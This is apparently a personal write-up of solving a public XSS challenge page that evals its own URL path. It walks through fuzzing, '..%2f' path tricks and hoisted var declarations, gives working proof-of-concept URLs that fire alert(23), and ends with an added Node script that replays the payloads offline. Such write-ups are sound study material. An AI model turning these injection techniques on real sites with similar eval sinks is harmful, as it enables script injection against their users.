While surfing the internet for some security news, I came across an XSS challenge.
Challenge address: https://renwax23.github.io/X/chal/oct22/
It's hosted on GitHub Pages, so there is no backend; all the code is in the front end. Let's look at it.
if(/\/chal\/oct22\//.test(location.pathname.substr(0,15))){
eval(location.pathname)
}
The logic is simple: the first 15 characters of location.pathname must contain /chal/oct22/, and then the whole pathname is passed to eval(). That eval() is the sink.
round one
Open https://renwax23.github.io/X/chal/oct22/ and check the console. We see a syntax error: ` Uncaught SyntaxError: Invalid regular expression flags at (index):23 `. That is what eval("/X/chal/oct22/") produces: JavaScript parses /X/ as a regular-expression literal and the letters chal that follow it as the regex flags, which are not valid flags. So I thought the key was regex. After reading some docs about regex, I couldn't get an answer.
I tried some random characters (-, &, ?, \) and got 404.
Round one failed.
round two
So I need to get a 200 response and insert some code into the URL.
But how? Some characters get URL-encoded, and some make the server return 404. I fuzzed the URL to see what I could insert while it still returned 200. No luck.
https://renwax23.github.io/X/chal/oct22//
I added a / to the URL and it returned 200. So I can insert / wherever I need it.
https://renwax23.github.io//X/chal/oct22/
I added a / at the front. Checking the console, there's no syntax error: the pathname now starts with //, which JavaScript reads as a line comment that swallows everything up to the end of the input. I thought this was the right way. So I need a line break, because // comments out the rest of the code. Trying '%0d%0a' and \u2028 (from prompt(1) to win): they are URL-encoded.
I also tried a/../, but Chrome resolves the .. segment and shortens the path before the page ever sees it.
Trying some URL-encoding: https://renwax23.github.io//X/chal/oct22/a/..%2f returns 200. The browser's URL parser does not treat %2f as a path separator, so a/..%2f stays in location.pathname, while the server evidently decodes it and resolves the path back to the directory.
Eureka!
Now I can inject code into pathname and still get 200.
round three
But there’s still no alert.
https://renwax23.github.io/X//chal/oct22/a/..%2f
So I moved the /. New error:
Uncaught SyntaxError: Unexpected token '.'
Not a regex syntax error any more. With the second / placed right after /X/, the parser now sees the regex literal /X/ followed by a chain of divisions: /X/ / chal / oct22 / a / ... and the .. after the last / is where it gives up.
So now I need to get the syntax right. After some trying, I got a new error message. https://renwax23.github.io/X//chal/oct22/a;//..%2f
Uncaught ReferenceError: chal is not defined
The ; ends the statement and the // that follows turns the remaining ..%2f into a comment, so the code now parses and fails only at run time, when it looks up chal.
So we need to define chal (and then oct22). In JavaScript, var declarations are hoisted, so a variable can be referenced before the line that declares it. I tried var chal, but a space is encoded as %20, which is a syntax error. We can use a /**/ comment to separate the keyword from the name instead.
In the end, we get the alert. poc: https://renwax23.github.io/X//chal/oct22/-alert(23);var//..%2f/..%2f//chal=1;var//..%2f/..%2f/..%2f//oct22=2//..%2f/..%2f
Several hours later I tried again and got a shorter one: https://renwax23.github.io/X//chal/oct22/alert(23);var//..%2f..//chal,oct22//..%2f..
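As an added example (not code from the challenge page or the write-up), the following Node script replays the challenge's gate and eval() sink against the pathnames discussed above and reports how each one is parsed and executed. The `payload` entry is this example's own construction, built with a `/* */` block comment between `var` and the declared names as described above; it is an assumption, not the page's PoC. `new Function()` stands in for the page's direct `eval()` so that each run is parsed as a fresh sloppy-mode body, and the URL checks use Node's WHATWG `URL`, which resolves dot segments the same way Chrome does.

```javascript
// Added example, not from the challenge page: replay the challenge's gate and
// eval() sink against candidate pathnames and report what the JS parser and
// runtime do with each. Runs offline under Node; the page's direct eval() is
// replaced by new Function() so that `var` declarations stay local per run.

// The gate from the challenge: /chal/oct22/ must appear in the first 15 chars.
function gateAccepts(pathname) {
  return /\/chal\/oct22\//.test(pathname.substr(0, 15));
}

// What a WHATWG URL parser (Chrome, and Node's URL) leaves in location.pathname:
// "a/../" is resolved away, while "a/..%2f" is kept because %2f is not a separator.
function pathnameSeenByBrowser(url) {
  return new URL(url).pathname;
}

// Feed a pathname to the sink with alert() stubbed, and record the outcome:
// gate result, values passed to alert(), and "Name: message" of any error.
function evaluatePath(pathname) {
  const result = { gate: gateAccepts(pathname), alerts: [], error: null };
  if (!result.gate) return result;
  const previousAlert = globalThis.alert;
  globalThis.alert = (v) => { result.alerts.push(v); };
  try {
    new Function(pathname)(); // parse + run, standing in for eval(location.pathname)
  } catch (e) {
    result.error = `${e.name}: ${e.message}`;
  } finally {
    globalThis.alert = previousAlert;
  }
  return result;
}

// Candidate pathnames in the order the write-up tried them (constructed here).
// The last one is this example's own payload, assumed to use a /* */ block
// comment between `var` and the names it declares; it is not the page's PoC.
const CASES = {
  original:  "/X/chal/oct22/",             // /X/ with flags "chal" -> SyntaxError
  comment:   "//X/chal/oct22/a/..%2f",     // starts with // -> the whole input is a comment
  division:  "/X//chal/oct22/a/..%2f",     // /X/ / chal / oct22 / a / ..  -> '.' SyntaxError
  reference: "/X//chal/oct22/a;//..%2f",   // parses; chal is looked up at run time -> ReferenceError
  payload:   "/X//chal/oct22/alert(23);var/*/..%2f..*/chal,oct22//..%2f..",
};

// Evaluate every case and return the results keyed by case name.
function runAll() {
  const out = {};
  for (const [name, pathname] of Object.entries(CASES)) out[name] = evaluatePath(pathname);
  return out;
}

for (const [name, r] of Object.entries(runAll())) {
  const outcome = r.error ?? `alerts=${JSON.stringify(r.alerts)}`;
  console.log(name.padEnd(10), r.gate ? "gate ok " : "gate no ", outcome);
}
console.log(pathnameSeenByBrowser("https://renwax23.github.io/X/chal/oct22/a/../"));
console.log(pathnameSeenByBrowser("https://renwax23.github.io/X/chal/oct22/a/..%2f"));
```

Run it with node. The `division` case fails at parse time while `reference` fails only at run time, which is why the semicolon followed by `//` was the step that turned syntax errors into a missing-variable error; in the `payload` case the hoisted `var chal,oct22` makes the division chain evaluate to NaN without throwing, and `alert(23)` fires as one of its operands.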
Really interesting challenge. Thanks to the author.